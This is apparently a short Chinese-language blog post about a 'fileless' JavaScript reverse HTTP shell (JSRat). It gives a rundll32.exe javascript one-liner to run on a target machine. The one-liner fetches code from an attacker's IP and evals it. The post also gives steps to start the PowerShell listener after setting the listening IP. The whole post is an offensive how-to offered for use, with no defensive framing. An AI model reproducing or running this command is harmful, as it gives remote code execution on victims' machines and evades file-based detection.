无文件js反弹http shell

代码都在这里: 

https://gist.github.com/subTee/f1603fa5c15d5f8825c0 


目标机器上执行: 

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://反弹的IP/connect",false);h.Send();B=h.ResponseText;eval(B)

本地执行POWERSHELL脚本 

PS E:\> .\JSRat.ps1 

注意修改PS里对应的$Server = '本地监听的IP' #Listening IP. Change This. 


执行效果如下 

2015123109535887414.png

评论回复